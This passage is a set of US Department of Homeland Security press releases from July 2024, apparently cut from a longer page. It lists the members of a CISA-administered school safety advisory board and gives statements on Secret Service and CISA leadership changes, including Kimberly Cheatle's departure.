Shani Buggs, Assistant Professor, University of California Davis Violence Prevention Research Program and Founder, The Black and Brown Collective;
Mo Canady, Executive Director, National Association of School Resource Officers;
Noel Candelaria, Secretary-Treasurer, National Education Association;
Jennifer DePaoli, Senior Researcher, Learning Policy Institute;
Michele Gay, Founder and Executive Director, Safe and Sound Schools;
Seth Gerson, Program Director, K-12 Education, National Governors Association;
Alison Grodzinski, Managing Director, National Center for School Safety;
Christine Harms, Director, Colorado Office of School Safety;
Nicole Hockley, Co-Founder and Chief Executive Officer, Sandy Hook Promise;
Devon Horton, Superintendent, DeKalb County School District, Georgia;
Yvonne Johnson, President, National Parent Teacher Association;
Brent Jones, Superintendent, Seattle Public Schools, Washington;
Liz King, Senior Program Director, Education Equity, The Leadership Conference on Civil and Human Rights;
Keith Krueger, Chief Executive Officer, Consortium for School Networking;
Tim Lutz, Superintendent, Red Lake School District, Minnesota;
Chad Marlow, Senior Policy Counsel, American Civil Liberties Union;
Donna Michaelis, Director, Virginia Center for School and Campus Safety;
Tony Montalto, President, Stand With Parkland;
David Osher, Vice President and Institute Fellow, American Institutes for Research;
Melissa Reeves, Past President, National Association of School Psychologists;
Marlene Sallo, Executive Director, National Disability Rights Network;
David Schuler, Executive Director, The School Superintendents Association; and
Debra Wilson, President, National Association of Independent Schools.

The Board is administered by CISA on behalf of the Secretary. It will convene in Fall 2024 for its first meeting.

To learn more about the Board, please visit cisa.gov/resources-tools/groups/federal-school-safety-clearinghouse-external-advisory-board.

###

July 24, 2024

Statement from Secretary of Homeland Security Alejandro N. Mayorkas on the Appointment of Ronald L. Rowe, Jr. as Acting Secret Service Director

Source: US Department of Homeland Security

Secretary of Homeland Security Alejandro N. Mayorkas released the following statement regarding the appointment of Ronald L. Rowe, Jr. as Acting Director of the United States Secret Service:

“I have appointed United States Secret Service Deputy Director Ronald L. Rowe, Jr. to serve as Acting Director of the Secret Service. Deputy Director Rowe has been Deputy Director of Secret Service since April 2023. A 24-year veteran of the Secret Service, he previously served as the agency’s Assistant Director for the Office of Intergovernmental and Legislative Affairs, Deputy Assistant Director for the Office of Protective Operations, and in other leadership positions. I appreciate his willingness to lead the Secret Service at this incredibly challenging moment, as the agency works to get to the bottom of exactly what happened on July 13 and cooperate with ongoing investigations and Congressional oversight. At the same time, the Secret Service must effectively carry on its expansive mission that includes providing 24/7 protection for national leaders and visiting dignitaries and securing events of national significance in this dynamic and heightened threat environment.

“The Secret Service is the greatest protective service in the world, with one of the most difficult and solemn missions in government. I have the utmost confidence in Deputy Director Rowe and the men and women of the Secret Service, who put their lives on the line every day and deserve our full support.”

July 24, 2024

Statement from CISA Director Easterly on Leadership Changes at CISA

Source: US Department of Homeland Security

WASHINGTON – Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly issued the following statement today on changes to CISA leadership:

It has been an honor to serve with Brandon Wales over the past three years. Brandon has guided CISA through some of the most serious threats facing our Nation. From Sunburst to the ransomware attack on Colonial pipeline to the Russian full-scale invasion of Ukraine, the Agency and the Department have looked to Brandon time and again for his leadership and deep expertise. With more than 20 years of federal service, including more than 19 at the Department, he was here before we were CISA and expertly helped shape the Agency into what we are today. While we’re going to miss Brandon greatly, we’ve been planning for his departure together and are prepared to execute a seamless transition. Bridget Bean will take over as Executive Director in August, transitioning from her current role as Assistant Director for Integrated Operations. With more than three decades of federal government service, Bridget brings extraordinary leadership and experience to the role, which will involve a dedicated focus on operationalizing a fully unified and cohesive team. We thank Brandon for all he has done for CISA and the Nation and thank Bridget for stepping into this critical role.

###

About CISA

Visit CISA.gov for more information and follow us on Twitter, Facebook, LinkedIn, Instagram.

July 24, 2024

Statement of Secretary of Homeland Security Alejandro N. Mayorkas on the Departure of Kimberly Cheatle

Source: US Department of Homeland Security

Secretary of Homeland Security Alejandro N. Mayorkas released the following statement regarding Kimberly Cheatle:

“I am grateful to Kimberly Cheatle for her leadership as the Director of the United States Secret Service and for her lifelong devotion to our country.

“Director Cheatle has dedicated her career to public service. She has served in the Secret Service for more than 29 years, rising through the ranks because of her talent, hard work, selfless dedication to mission, and integrity. Daily, she risked her life to protect others, serving on the frontlines and securing events for every president since President Clinton. She supervised protection for Vice President Cheney, led the Secret Service’s training center, supervised the protection of Vice President Biden, oversaw the agency’s entire protective mission during the administration of President Trump, and more.

“Reflecting her devotion to country above all else, Director Cheatle returned from retirement to lead the agency and its noble mission that she loves and to which she has devoted her career. Over the past two years, she has led the Secret Service with skill, honor, integrity, and tireless dedication. She is deeply respected by the men and women of the agency and by her fellow leaders in the Department of Homeland Security. I am proud to have worked with Director Cheatle and we are all grateful for her service.

“The men and women of the United States Secret Service risk their lives every day to protect others. They make the Secret Service the finest protective agency in the world.”